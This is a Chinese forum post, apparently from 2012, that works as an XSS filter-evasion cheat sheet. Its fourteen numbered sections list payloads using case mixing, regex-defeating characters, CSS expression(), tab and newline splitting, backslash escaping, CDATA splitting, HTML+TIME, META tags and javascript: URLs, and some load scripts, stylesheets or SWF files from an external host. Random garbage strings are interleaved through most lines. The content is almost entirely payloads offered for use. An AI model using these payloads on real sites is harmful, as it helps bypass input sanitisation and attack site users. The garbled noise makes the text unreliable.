1. 改变字符大小写, z6 W2 l, I# j
4 u' L+ M; B& U2 B; J5 v
* E/ }) K" P# U/ g+ H: R1 [( c# O+ X9 p$ w2 W, |% x4 ^
<sCript>alert(‘d’)</scRipT>
: ~ U5 b+ z ^# o. b. L: v f$ Y& Y& L1 C& N) k9 t
2. 利用多加一些其它字符来规避Regular Expression的检查/ V" D) m7 P; p; g. c- {
" U* L, d1 {6 }: i0 F
<<script>alert(‘c’)//<</script>
& h: S. U$ F/ P1 _, ~; k0 C) Y5 C' S. y6 B
<SCRIPT a=">" SRC="t.js"></SCRIPT>; r' y+ B( o( L5 S; {: B: g# E! s
" t+ t! y" n/ y1 M2 h7 h <SCRIPT =">" SRC="t.js"></SCRIPT>" t3 \1 @$ J- V" B
: ~8 v& {. @+ @8 A, [# ]' Y, W <SCRIPT a=">" ” SRC="t.js"></SCRIPT>' r X5 o# k ?: Z: ]# ~. L& m) y
$ c1 a; P# L0 P <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
6 a2 x% Q& V7 t3 M5 X
: _ O( [- H/ Z& J <SCRIPT a=`>` SRC="t.js"></SCRIPT>. I Y! _5 @& j' ^$ C* F
7 ?8 W/ R" @( I+ ?" _) m6 a
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
2 t& y9 w; ~ f" p" f: @) T
( \8 k5 l1 v! r2 O) r3. 以其它扩展名取代.js
% N. }5 F: R" V! z s
% V8 \; `4 B8 ~1 n: Z <script src="bad.jpg"></script>
6 |* Y8 D# y9 E8 h4 S) i8 c$ [7 H; x' v- }
4. 将Javascript写在CSS档里8 Y' T- f: d( O$ A; ?: ?2 `/ U
) e- ~0 g* ~# P: |6 C
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">/ G% x2 _3 e2 U/ \
! B) \9 b) k0 K example:
8 Z% R: A: o# N; k# |+ ^! E3 L! Y, S4 E% F9 e; O
body {
8 W# S. U, _5 L! C
& _% `: l5 t. c3 j background-image: url(‘javascript:alert("XSS");’)' C8 y9 U% ^. p0 m! x1 A
$ J0 L3 r; Q: F/ v$ h% I3 k# a
}5 B: D. j" P9 A! \, o8 N& l- s0 _
; h4 M2 c6 r2 j! y( x, p5. 在script的tag里加入一些其它字符
" i1 J _6 ^+ P& O5 ?
. v( k+ B3 J# L: b& _/ A; k <SCRIPT/SRC="t.js"></SCRIPT>5 E$ d) D- r3 Z2 `! R I; V) ^! b+ j
$ v, i6 C0 a p, _ <SCRIPT/anyword SRC="t.js"></SCRIPT>! ?4 b( T! Q- R- o# g2 o6 _: T+ a- n
7 c b3 K( p+ d; A/ P# \6. 使用tab或是new line来规避% @! G3 t. `8 c: t( D" V
) G( ~* D; P2 F6 a
<img src="jav ascr ipt:alert(‘XSS3′)">; q" t, S" {/ @
, K' F f! Y$ n. H( b' [
<img src="jav ascr ipt:alert(‘XSS3′)">; T- I9 n* z, }' Z
i0 m6 }& @: D: T7 M, i) \6 ]
<IMG SRC="jav ascript:alert(‘XSS’);">
# F0 t7 j2 [6 }( L! L3 g" u4 f$ K: m. }9 X* T7 u9 ~+ V
-> tag& N4 J' r- f5 M O
: Z# R6 ^1 z P3 k) G4 N0 Q
-> new line
/ c, t5 R( c3 O: p m% A# y% z+ D) q9 r9 n2 c
7. 使用"\"来规避
# g9 b# L7 k. v, W: t+ w: G
! Y; K/ T3 L2 l6 c <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>% o5 X( G& L: J. U% I
% p4 f D1 g; a7 x, C0 A <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>- c' u. K; J0 Q
/ }0 f1 ~8 Y2 H4 M! [! r6 d <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
% a, L* p9 @* o: p' G+ @5 u3 P& T8 K; P6 g ~! d$ Q4 S
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
- M, r. Z1 D( V7 t7 L6 E) n0 r* m2 P$ S. r( q& j+ t
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>5 R- M* F0 {! I$ ~
' |0 W* g/ t/ Q1 a& o3 a! K8. 使用Hex encode来规避(也可能会把";"拿掉)6 }" c* e! O2 |4 M
* C$ K4 G- L* _9 v" X5 ]- e <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
: M7 t; I2 k3 k" G7 l& F# X
. b D; ^& C# l" ?( ~ 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
9 E n" w( j/ F: V
) ~* ~: x+ U% n0 D5 t) L <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
! X R7 u3 v3 O& U7 z# k
" [6 Z3 E1 g- u; ` 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">% a5 ?8 ]# R- E; h) X
7 q- ^1 X7 j+ N s9 p
9. script in HTML tag! b9 B, G; i' C, _0 `
" |& V+ _% n) j
<body onload=」alert(‘onload’)」>. X Z# Q5 G/ Z/ L# f I
1 @$ g, U8 Z1 T onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
; ?/ j# a: x& a/ s6 m8 c
* G7 D# `' s5 G4 Q5 v) G4 b4 X10. 在swf里含有xss的code
4 i( @# ^3 h% {& E* A, w2 c7 L g( M/ \
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
& o: ]/ d. [! L: J$ j3 z2 s( G7 o2 M4 _/ M
11. 利用CDATA将xss的code拆开,再组合起来。
. Y4 R. q. z1 i, s' P% k) x+ m1 _4 x$ D8 K* y9 l/ z
<XML ID=I><X><C>1 A$ P6 Z6 @" s. _$ b' U+ G) A3 H' r# o
; s" f" ], v" v+ Q4 q2 u1 L <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>7 g+ D! U* p L$ y
% t0 l9 ^$ k6 J( s
</C></X>
$ f! e7 V4 I3 y8 z: t1 b6 h% \3 ?0 e
, K7 O! z" z! J$ S" B </xml>8 @& D( R. H+ F1 N2 Q! r1 W
( Q8 Z- }" g& ^1 U- m3 ^1 w <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>9 L2 Q; Z3 {/ r4 {
: v( ^2 U7 {, g( E( S
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>+ A# Q; Q r8 @ t
4 B. j2 W. _ `/ m' E) Z1 W
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
0 q& @0 }- R3 O' F4 N/ H/ I1 t% S! `- R- y: B* M* t
12. 利用HTML+TIME。
0 n9 ^" g' o0 {1 i- F
& R" H w% J6 y) A' E+ j' a <HTML><BODY>" ]* R5 A* z I5 ^# f4 Q
: f& o% O9 X7 v0 k. Q! T
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
4 X) S: R" n8 K" e" e
& _+ k1 S! j7 r: X, L9 v7 z2 R' M6 O <?import namespace="t" implementation="#default#time2">2 i7 R. G4 C. }- \! U0 J$ R+ B
1 f5 i9 Y* `( o9 n <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">& J! m/ H( j* f/ |7 i/ I7 ?
5 d* U; s2 S0 k' [7 I </BODY></HTML>
- g# a8 y2 D6 b) k% ^
! \) L1 V( m2 _' z7 X13. 透过META写入Cookie。9 I" a$ b$ N3 _9 h. J6 p2 v5 p, j
+ G- c3 g, K+ f8 a5 y
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
8 [8 H2 @. H, p: D- l3 {' N1 c. r+ {( w7 n$ ]9 P! I
14. javascript in src , href , url, K" h- H6 Y9 ~$ Y. D5 o: l
) Q- _0 t# ~% q8 h. a <IFRAME SRC=javascript:alert(’13′)></IFRAME>
1 W# [/ f/ q3 s, c, C% L) h; F7 {+ o# B& V
<img src="javascript:alert(‘XSS3′)">% o! v% Y1 \# }( |- ~% y
; G4 T8 l. b8 q) t" q7 a8 m+ V<IMG DYNSRC="javascript:alert(‘XSS20′)">
& @& y9 t" C& d! @9 {$ _; N% _# }3 g, z/ y2 W
<IMG LOWSRC="javascript:alert(‘XSS21′)">
, p1 m4 F3 i- T) v7 u: L: G$ t+ m4 F5 [* k* M8 Q) ?
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
9 ^7 a$ g4 u* B; {
/ s+ K. T) c6 N <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
! [3 [8 J4 D% a2 b4 G
* V- [, Y5 k) `% v0 Q <TABLE BACKGROUND="javascript:alert(‘XSS29′)">% C# K u& l" O& F; N) e/ c z
3 z% v. T& |* v! C
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
; f2 v" t* B v* D" G7 K0 }/ x( c( `# W4 l
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
0 d I+ b, a" g6 I4 g) v+ |! J: P( _/ e( c
</STYLE><A CLASS=XSS></A>
1 M- p7 i! G) a9 q3 h) w' P& r- w$ N0 a
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>+ i0 _3 o0 `( c8 B2 ~' |4 H
2 Z9 k0 @2 a1 Y( F6 O3 B
|
发表于 2012-12-31 09:59:28
收藏
支持
反对